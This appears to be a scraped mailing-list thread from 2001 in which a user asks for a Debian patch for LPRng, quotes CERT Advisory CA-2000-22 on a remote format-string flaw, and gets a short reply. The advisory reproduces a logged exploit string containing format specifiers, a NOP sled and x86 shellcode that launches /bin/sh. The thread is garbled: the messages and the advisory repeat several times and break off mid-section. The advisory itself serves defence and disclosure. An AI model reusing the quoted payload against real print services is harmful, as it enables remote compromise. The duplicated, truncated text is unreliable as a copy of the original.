lprng
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format
string vulnerability,"[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation and determined that Mac OS X
Public Beta and Mac OS X Server do not use LPRng and are therefore not
vulnerable to this exploitation.
Caldera OpenLinux
See CSSA-2000-033.0 "format bug in LPRng" at:
http://www.calderasystems.com/support/security/advisories/CSSA-
2000-033.0.txt
Compaq Computer
Re: lprng
I know there's a debian package of lprng, but I don't know if the patch
you're talking about is applied to this package, I guess you should check
the changelog to find out.
Ron Rademaker
On Wed, 10 Jan 2001, V. Achiaga wrote:
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format
string vulnerability,"[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation
lprng
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a format
string vulnerability,[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation and determined that Mac OS X
Public Beta and Mac OS X Server do not use LPRng and are therefore not
vulnerable to this exploitation.
Caldera OpenLinux
See CSSA-2000-033.0 format bug in LPRng at:
http://www.calderasystems.com/support/security/advisories/CSSA-
2000-033.0.txt
Compaq Computer Corporation
Re: lprng
I know there's a debian package of lprng, but I don't know if the patch
you're talking about is applied to this package, I guess you should check
the changelog to find out.
Ron Rademaker
On Wed, 10 Jan 2001, V. Achiaga wrote:
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a format
string vulnerability,[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation
